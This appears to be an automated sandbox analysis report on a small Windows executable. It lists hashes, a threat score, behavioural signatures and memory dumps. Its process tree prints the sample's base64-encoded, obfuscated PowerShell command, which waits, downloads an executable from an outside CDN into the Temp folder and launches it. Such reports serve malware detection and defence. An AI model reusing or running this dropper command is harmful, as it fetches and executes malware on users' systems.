Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
-
submitted
08-12-2023 02:35
General
-
Target
2DFGVCXV.exe
-
Size
5KB
-
MD5
35beb6bfc19b4f3f1a0163f52870394a
-
SHA1
211362d1784343a46988ca4eae79bb6d99d68d0b
-
SHA256
e593bbbea1e480fdd8018bdaf481ef9f76f6b7c8cf783603164633bb0f8b2979
-
SHA512
bd4dc84de924069bf0adc12136badba67c89af49bbe1692631f25c674bce0f2e33c49820f72da019b0a28fe5ab646a438371458ddfe3ddde722b7438f0c86b77
-
SSDEEP
96:Ende79bSCbn4KLZDe5RuNDZPgDtENtUqwUNGOuKGd3ojfrl:WO9bZbn4KLZD+0NDZcSNtUqwUgiGdS
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2DFGVCXV.exe"C:\Users\Admin\AppData\Local\Temp\2DFGVCXV.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdgBrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AaQBtAGcALgBnAHUAaQBsAGQAZQBkAGMAZABuAC4AYwBvAG0ALwBDAG8AbgB0AGUAbgB0AE0AZQBkAGkAYQBHAGUAbgBlAHIAaQBjAEYAaQBsAGUAcwAvADEAYQAzADAAZAA5ADkAMwA0ADMAZgA0ADgANQBlADIAMAAxADkAYwA4AGQANQBiADUAMwA1ADgAZgBhAGIAOAAtAEYAdQBsAGwALgB6AGkAcAAnACwAIAA8ACMAbAB1AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAGIAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AHkAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEQARgBHAEQARgBFAFcALgBlAHgAZQAnACkAKQA8ACMAeQB6AHAAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdQBmAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAbgB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIARABGAEcARABGAEUAVwAuAGUAeABlACcAKQA8ACMAeABzAGUAIwA+AA=="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2876-0-0x00000000001C0000-0x00000000001C8000-memory.dmpFilesize
32KB
-
memory/2876-1-0x000007FEF5150000-0x000007FEF5B3C000-memory.dmpFilesize
9.9MB
-
memory/2876-2-0x000007FEF5150000-0x000007FEF5B3C000-memory.dmpFilesize
9.9MB
-
memory/2928-7-0x000000001B380000-0x000000001B662000-memory.dmpFilesize
2.9MB
-
memory/2928-8-0x000007FEF24B0000-0x000007FEF2E4D000-memory.dmpFilesize
9.6MB
-
memory/2928-10-0x0000000002310000-0x0000000002318000-memory.dmpFilesize
32KB
-
memory/2928-9-0x0000000002260000-0x00000000022E0000-memory.dmpFilesize
512KB
-
memory/2928-11-0x000007FEF24B0000-0x000007FEF2E4D000-memory.dmpFilesize
9.6MB
-
memory/2928-12-0x0000000002260000-0x00000000022E0000-memory.dmpFilesize
512KB
-
memory/2928-13-0x0000000002260000-0x00000000022E0000-memory.dmpFilesize
512KB
-
memory/2928-14-0x0000000002260000-0x00000000022E0000-memory.dmpFilesize
512KB
-
memory/2928-15-0x000007FEF24B0000-0x000007FEF2E4D000-memory.dmpFilesize
9.6MB
-
memory/2928-16-0x0000000002260000-0x00000000022E0000-memory.dmpFilesize
512KB
-
memory/2928-17-0x000007FEF24B0000-0x000007FEF2E4D000-memory.dmpFilesize
9.6MB